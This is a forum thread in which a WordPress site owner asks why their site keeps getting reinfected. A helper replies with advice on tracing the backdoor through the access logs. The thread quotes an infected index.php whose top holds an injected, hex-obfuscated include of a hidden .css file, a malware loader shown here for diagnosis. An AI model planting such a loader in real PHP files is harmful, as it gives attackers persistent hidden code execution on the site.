Almost as fast as i scan and remove the infection from the site, i go back a few hours later and its infected again. I’m not sure what to do now. I have changed all passwords and also moved the site to a new server, just in case it helped.
https://lloydsblinds.co.uk/
Any help will be much appreciated.
Here is an example of the quarantined of index.php which keeps getting infected (there are others).
<?php
/*aaa76*/
$rk = “/\x75sr/www/\x75sers/lloydsw/wp\x2dincl\x75des/blocks/post\x2dterms/.3460fed5.css”; if (!isset($rk)) {var_dump ($rk);} else { @include_once /* 43 */ ($rk); }
/*aaa76*/
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( ‘WP_USE_THEMES’, true );
/** Loads the WordPress Environment and Template */
require __DIR__ . ‘/wp-blog-header.php’;
If you have moved the site to a new server and it is still getting hacked on regular intervals then you most definitely have a backdoor script or a Zero Day vulnerability on the site that is letting in this hacker.
You can find the script responsible by reviewing the access_log files on your server. You just need to look at what URL was requested at the exact time of the last infection. You can get the infection time on the Anti-Malware Quarantine page. Please note, the quarantine and infection times are stored in GMT/UTC so there may be some conversion required if your server logs are in the local time of the server.
Please let me know what you find or if you need more help. You can email me directly with your log files and a screenshot of your Quarantine if you cannot find the relevant entries. If you do find a new threat that is allowing this hack then please send me that file as well so that I can add it to my definition updates.